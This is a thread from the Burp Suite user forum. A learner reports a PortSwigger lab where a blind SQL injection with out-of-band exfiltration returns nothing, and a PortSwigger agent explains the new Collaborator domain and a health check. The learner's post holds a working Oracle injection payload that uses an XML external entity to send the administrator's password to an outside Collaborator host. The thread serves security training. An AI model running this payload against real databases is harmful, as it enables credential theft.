The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Blind SQL injection with out-of-band data exfiltration

Yan | Last updated: Sep 02, 2022 01:48PM UTC

Hi Team! I am struggling with the burp collaborator client. Step1: I press the "copy to clipboard" button and get the following: rkfb4oeenx9ev7hi0i8nuor1csii67.oastify.com Looking very different than the link used in the video By Rana. Step2: I get the following payload: ' || SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password from users where username='administrator' )||'.rkfb4oeenx9ev7hi0i8nuor1csii67.oastify.com/"> %remote;]>'),'/l') FROM dual Step3 : I get a 200 OK Step 4: I go to collaborator to poll. No results. Please could you help. Thanks, Yan

Michelle, PortSwigger Agent | Last updated: Sep 02, 2022 02:58PM UTC

Thanks for your message. Since Rana recorded the video we have added a new domain name for the public Burp Collaborator server, which is oastify.com, so there will be a slight difference. To poll for results using the Collaborator client, the machine where you have Burp installed will need to be able to access oastify.com. You can test connectivity by going to Project Options -> Misc -> Burp Collaborator Server -> Run health check. I hope this helps.

Yan | Last updated: Sep 03, 2022 05:07PM UTC

I am on a Mac, is it the same step by step?Thanks Michelle!

Michelle, PortSwigger Agent | Last updated: Sep 05, 2022 09:54AM UTC